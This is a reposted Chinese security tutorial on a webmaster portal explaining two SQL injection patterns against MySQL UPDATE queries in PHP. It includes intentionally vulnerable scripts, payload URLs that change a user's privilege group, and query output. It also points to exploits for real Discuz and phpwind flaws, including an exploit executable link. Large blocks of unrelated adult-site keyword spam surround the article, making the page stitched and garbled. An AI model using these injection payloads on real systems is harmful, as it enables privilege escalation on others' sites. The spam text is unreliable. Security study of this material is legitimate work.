亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁(yè) 安全 安全教程 查看內(nèi)容

UPDATE注射的兩個(gè)基本模式

2022-9-24 10:51| 查看: 2734 |來(lái)源: 互聯(lián)網(wǎng)

一.測(cè)試環(huán)境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache 1.3.33 二.測(cè)試數(shù)據(jù)庫(kù)結(jié)構(gòu): -----start--- -- 數(shù)據(jù)庫(kù): `test` -- -- ----------------------------
一.測(cè)試環(huán)境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
二.測(cè)試數(shù)據(jù)庫(kù)結(jié)構(gòu):
-----start---
-- 數(shù)據(jù)庫(kù): `test`
--
-- --------------------------------------------------------
--
-- 表的結(jié)構(gòu) `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 導(dǎo)出表中的數(shù)據(jù) `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
三.測(cè)試模式:
1,變量沒有帶’’或""[MOD1]
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
$sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號(hào)
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "

SQL Query:$sql

";
?>
腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權(quán)限等級(jí),我們的目的就是通過構(gòu)造$p 來(lái)達(dá)
到修改groupid的目的:
那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查詢:
mysql> select * from userinfo;
--------- ------- --------
| groudid | user | pass |
--------- ------- --------
| 1 | heige | 123456 |
--------- ------- --------
1 row in set (0.01 sec)
用戶heige的groudid又2改為1了 :)
所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個(gè)就是我們的模式1。
2,變量帶’’或""[MOD2]
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "

SQL Query:$sql

";
?>
為了關(guān)閉’我們構(gòu)造$p應(yīng)該為123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了\’
提交的語(yǔ)句變成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’
mysql查詢:
mysql> select * from userinfo;
--------- ------- --------------------
| groudid | user | pass |
--------- ------- --------------------
| 2 | heige | 123456’,groudid=’1 |
--------- ------- --------------------
1 row in set (0.00 sec)
groudid并沒有被修改。那么在變量被’’或""時(shí) 就完全沒有被注射呢?不是 下面我們看模式2:
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的數(shù)據(jù)寫入數(shù)據(jù)庫(kù)
$sql= "select pass from userinfo where user=’heige’";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]
$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我們測(cè)試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
回mysql查詢下 :
mysql> select * from userinfo;
--------- ------- --------
| groudid | user | pass |
--------- ------- --------
| 1 | heige | 123456 |
--------- ------- --------
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid為1。 這個(gè)就是我們的模式2了,簡(jiǎn)單的描敘如下:
update-->select-->update
四.實(shí)際模式
模式1:Discuz 2.0/2.2 register.php 注射
漏洞分析:http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞
漏洞分析:
update (profile.php 注射變量為$proicon update語(yǔ)句里為,icon=’$userdb[icon]’)
|
v
select (jop.php)
|
v
updtate (jop.php) Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

本文最后更新于 2022-9-24 10:51,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        亚洲gay无套男同| 国产日韩精品一区二区浪潮av| 久久国产福利国产秒拍| 91在线观看免费视频| 欧美激情综合五月色丁香| 国产一区二区不卡| 久久日一线二线三线suv| 亚洲综合丝袜美腿| 亚洲精品一区在线观看| 99视频精品免费视频| 久久久久久久精| 99久久久久久| 成人午夜大片免费观看| 欧美国产日韩a欧美在线观看| 国产一区二区h| 国产综合一区二区| 亚洲一二三区视频在线观看| 欧美日韩日本视频| 成人激情文学综合网| 不卡的电影网站| 视频一区二区欧美| 中文字幕第一区| 精品人在线二区三区| 欧美一级淫片007| 在线观看亚洲精品| 首页国产丝袜综合| 日韩成人av影视| 国产精品国产精品国产专区不蜜 | 国产二区国产一区在线观看| 综合激情成人伊人| 精品久久久久99| 欧美韩国日本不卡| 欧美国产欧美综合| 国产精品国产三级国产普通话三级 | 三级欧美在线一区| 一区二区在线观看视频在线观看| 精品国产伦一区二区三区观看方式| 久久精品亚洲国产奇米99| 亚洲欧美日韩国产综合| 国产精品乱码一区二区三区软件| 日韩欧美精品在线视频| 欧美日韩在线播放三区四区| 欧美日韩精品一区二区天天拍小说 | 中文一区在线播放| 中文字幕一区二区三区四区不卡| 亚洲成人黄色影院| 成人午夜精品一区二区三区| hitomi一区二区三区精品| 日本vs亚洲vs韩国一区三区二区 | 色婷婷综合视频在线观看| 欧美日韩国产美| 亚洲人成伊人成综合网小说| 国产成人啪午夜精品网站男同| 欧美日韩在线观看一区二区| 日韩欧美国产系列| 中文字幕一区二区三中文字幕| 亚洲国产日韩a在线播放性色| 精品一区二区三区欧美| 日本高清不卡视频| 偷拍一区二区三区| 欧美色图第一页| 亚洲福中文字幕伊人影院| 日本高清不卡视频| 丝袜美腿亚洲色图| 日韩视频免费直播| 激情六月婷婷久久| 国产日产欧美一区| 91性感美女视频| 午夜精品久久久久久久久久久 | 国产精品久99| 欧美综合天天夜夜久久| 天天免费综合色| 国产人妖乱国产精品人妖| 91久久线看在观草草青青| 天天综合网 天天综合色| 欧美久久一二区| 国产原创一区二区| 亚洲成av人片一区二区三区| 久久久午夜精品| 日韩一区二区免费电影| 色综合久久精品| 成人激情小说网站| 狠狠色狠狠色合久久伊人| 最近中文字幕一区二区三区| 日韩精品一区二区三区三区免费| www.日韩大片| 国产在线精品免费| 麻豆国产91在线播放| 亚洲伊人伊色伊影伊综合网| 国产精品国产三级国产普通话三级 | 亚洲国产精品精华液2区45| 不卡av在线网| 高清成人在线观看| 972aa.com艺术欧美| 欧美三级电影在线看| 欧美精品亚洲二区| 精品国产91洋老外米糕| 日韩视频永久免费| 精品日韩欧美一区二区| 国产夜色精品一区二区av| 久久久噜噜噜久久中文字幕色伊伊| 久久精品夜色噜噜亚洲aⅴ| 国产色爱av资源综合区| 国产午夜一区二区三区| 香蕉成人啪国产精品视频综合网| 天天综合色天天综合| 97aⅴ精品视频一二三区| 欧美视频一区二区三区四区| 亚洲精品一区二区三区蜜桃下载| 国产精品久久久久久久久动漫 | 国产精品美女久久久久av爽李琼| 亚洲国产成人午夜在线一区| 亚洲乱码国产乱码精品精的特点| 麻豆精品在线播放| 91麻豆国产精品久久| 678五月天丁香亚洲综合网| 欧美激情一区在线| 日韩av不卡在线观看| 欧美日韩亚洲综合| 一区二区在线观看av| 久色婷婷小香蕉久久| 欧美无砖专区一中文字| 最新欧美精品一区二区三区| 久久精品免费观看| 精品伦理精品一区| 麻豆精品蜜桃视频网站| 欧美中文字幕亚洲一区二区va在线| 日韩精品自拍偷拍| 国内精品免费在线观看| 久久综合网色—综合色88| 麻豆精品新av中文字幕| 日韩欧美不卡一区| 日韩国产欧美三级| 久久影院午夜论| 成人精品在线视频观看| 亚洲色图一区二区| 91精品国产欧美一区二区| 久久国产精品免费| 国产精品毛片a∨一区二区三区| 91亚洲永久精品| 国模一区二区三区白浆| 极品尤物av久久免费看| 国产精品1024| 成人激情电影免费在线观看| 国产毛片一区二区| 久久精品国产精品亚洲精品| 亚洲制服丝袜一区| 国产精品动漫网站| 久久久亚洲午夜电影| 在线视频一区二区三区| 成人午夜精品一区二区三区| 三级欧美在线一区| 蜜臀精品久久久久久蜜臀 | 日韩中文字幕麻豆| 一区二区三区精品| 亚洲一区二区三区激情| 国产精品大尺度| 精品va天堂亚洲国产| 日韩欧美激情一区| 欧美一区二区三区四区在线观看| 欧美在线一二三| 欧美精选一区二区| 3d成人动漫网站| 日韩欧美一区二区视频| 欧美xxxxxxxx| 亚洲激情自拍偷拍| 美女视频一区二区三区| 久久97超碰色| 欧美日韩一区中文字幕| 欧美精品一区视频| 一色桃子久久精品亚洲| 亚洲精品久久久久久国产精华液| 偷拍日韩校园综合在线| 国产精品一区一区三区| 99久久久久免费精品国产 | 一区二区三区在线观看欧美| 一区二区三区四区国产精品| 午夜精品免费在线观看| 91在线观看免费视频| 精品国产乱码久久久久久夜甘婷婷| 国产日韩欧美激情| 激情小说欧美图片| 欧美亚洲综合色| 国产精品自在在线| 67194成人在线观看| 一区二区三区免费看视频| 777午夜精品视频在线播放| 韩国精品在线观看| 亚洲一区二区在线观看视频 | 国产真实乱对白精彩久久| 99国产欧美另类久久久精品| 26uuu国产电影一区二区| 五月天一区二区三区| 欧美日韩黄色影视| 香港成人在线视频| 欧美精品 日韩| 国产一区欧美一区| 久久综合九色综合欧美98| 成人av资源下载| 免费看日韩a级影片|